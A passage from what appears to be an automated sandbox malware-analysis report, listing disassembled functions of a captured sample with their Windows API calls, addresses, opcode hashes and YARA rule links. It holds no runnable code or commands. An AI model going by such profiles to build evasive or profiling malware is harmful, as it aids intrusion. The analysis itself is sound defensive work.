                                                                                                                                                                                                                                            • API String ID: 301083792-0
                                                                                                                                                                                                                                            • Opcode ID: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
                                                                                                                                                                                                                                            • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                                                                                                                                                            Function 00448067 Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00448077
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32 ref: 00448089
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 00448101
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044812E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 806657224-0
                                                                                                                                                                                                                                            • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                                                                                                            • Instruction ID: 7f7bbd1fe339d2c51afc51fb5ca91abc0e6e8a710e1dc4bf18eddf40c0258009
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B231BA70904205DFEB159F69CC8287EBBB8FF0576072541AFE054AB2B1DB348D46DB58
                                                                                                                                                                                                                                            Function 00450E7A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2829624132-0
                                                                                                                                                                                                                                            • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                                                                                                            • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                                                                                                                                                                                                            Function 0043A66D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A765
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A76F
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A77C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                                                                            • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                                                                                                                                                                                                            Function 0043294A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                                                                                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1815803762-0
                                                                                                                                                                                                                                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                                            • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                                                                                                                                                                                                            Function 00442564 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0044259E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                                            • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                                                                                                                                                                                                            Function 004475A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                            • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                                                                                                                                                            Function 004510CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1663032902-0
                                                                                                                                                                                                                                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                                            • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                                                                                                                                                                                                            Function 00450D52 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00450E7A,00000001), ref: 00450DC4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084509184-0
                                                                                                                                                                                                                                            • Opcode ID: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
                                                                                                                                                                                                                                            • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                                                                                                                                                                                                            Function 004512FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2692324296-0
                                                                                                                                                                                                                                            • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                                                                            • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                                                                                                                                                                                                            Function 00450DED Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(004510CA,00000001), ref: 00450E39
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084509184-0
                                                                                                                                                                                                                                            • Opcode ID: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
                                                                                                                                                                                                                                            • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                                                                                                                                                                                                            Function 0041A7B2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                                                                                            • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                                                                                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                                                                                                                            Function 004470BE Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(Function_00047078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                                                                            • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                                                                                                                                            • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                                                                                                                                                                                                            Function 00450D07 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00450C5E,00000001), ref: 00450D3E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084509184-0
                                                                                                                                                                                                                                            • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                                                                                                                                            • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                                                                                                                                                                                                            Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                                            • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                                                                                                                                                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                                                                                                                                            Function 00426107 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: recv
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1507349165-0
                                                                                                                                                                                                                                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                                                                                                                                            Function 00433CE7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                                                                                                                                                                                                                            Memory Dump Source
